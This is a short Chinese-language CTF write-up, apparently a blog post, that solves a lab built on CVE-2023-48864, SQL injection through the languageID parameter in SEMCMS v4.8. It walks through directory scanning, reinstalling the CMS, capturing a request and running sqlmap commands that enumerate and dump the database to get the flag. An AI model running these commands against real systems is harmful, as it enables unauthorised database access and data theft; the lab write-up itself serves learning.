思路还是不够开阔,一直想着对搜索框进行sql注入,结果还是在参考了春秋云镜 CVE-2023-48864-CSDN博客才想到还能这样子。
简介
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在安全漏洞,该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞
正文
1.进入靶场
并没有什么线索啊,一开始我还以为是搜索框存在SQL注入,结果并不是。
2.御剑扫后台,发现install
3.进入install,开始安装
直接跳过试错环节
4.记住密码,转到后台
5.选一个商品,点击批量上架,抓包
6.爆库
sqlmap -r 3322.txt --batch --dbs 
7.爆表
sqlmap -r 3322.txt --batch -D semcms --tables 
8.爆数据
sqlmap -r 3322.txt --batch -D semcms -T flllaaaag --dump
得到flag
第一次做这种,思维还是太局限了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
